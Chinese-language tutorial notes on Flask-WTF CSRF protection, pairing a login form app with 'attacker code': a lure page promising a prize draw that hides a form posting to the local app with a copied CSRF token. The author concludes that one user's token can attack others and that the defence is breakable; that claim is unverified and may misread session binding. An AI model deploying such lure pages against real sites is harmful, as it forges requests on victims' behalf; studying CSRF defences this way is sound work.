一切看官网为准!
import os
from flask import Flask
from flask import render_template
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
app = Flask("xx")
app.config["SECRET_KEY"] = os.urandom(24)
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
@app.route("/log", methods=["GET", "POST"])
def log_in():
form = NameForm()
# validate_on_submit会帮你验是否是post方法以及验证表单
if form.validate_on_submit():
return "<h1>success</h1>"
# 经过validate_on_submit后,form.errors会被填充进错误信息,可以根据这个记录被攻击信息
if form.errors:
print("We got an attack! {0}".format(form.errors))
# 攻击者发送的post表单提交请求无效
# 可记录请求者信息做进一步处理
# 这里也可不做下面的处理我们将离开攻击者页面跳转到正常的登录操作页面
# return "<h1>access denied!</h1>"
return render_template("log_in.html", form=form)
if __name__ == "__main__":
app.run(port="8089")
log_in.html
<form method="POST" action="/log">
{{ form.csrf_token }}
{{ form.name.label }} {{ form.name(size=20) }}
<input type="submit" value="Go">
</form>
=========================================================
攻击者代码
from flask import render_template, Flask, request, jsonify
app = Flask("haha")
@app.route("/")
def root():
return render_template("page_attack.html")
if __name__ == "__main__":
app.run(port=8083)
page_attack.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>main</title>
</head>
<body>
<h1>抽大奖!</h1>
<form method="POST" action="http://127.0.0.1:8089/log">
<!-- 先以正常用户登录获取csrf_token,然后把下面csrf_token的value替换,竟然也可以攻击成功!
也就是说,获取一个正常用户的csrf_token然后写到攻击页面,就可以攻击其它用户了!
这也太扯了!而app.config["SECRET_KEY"]是全局变量,这个如果定时动态地去改变,
用户就要不停的登录验证,体验感就会变得很差!要想个办法!
-->
<input id="csrf_token" name="csrf_token" type="hidden" value="Ijg3YzI3OTZmOTc2MmY1ZDA1ZWExZDM4Yzg5M2M4ODgyMjg1NDAyNzgi.YbtM7w.CTeZ0rPpLd5N2QUy1DCItMx7dWo">
<label type="hidden" for="name">What is your name?</label>
<input type="hidden" id="name" name="name" required="" size="20" type="text" value="ffsdf">
<input type="submit" value="点我抽大奖">
</form>
</body>
</html>
也就是说上面对还是能够破解的,需要更加完善的解决方案!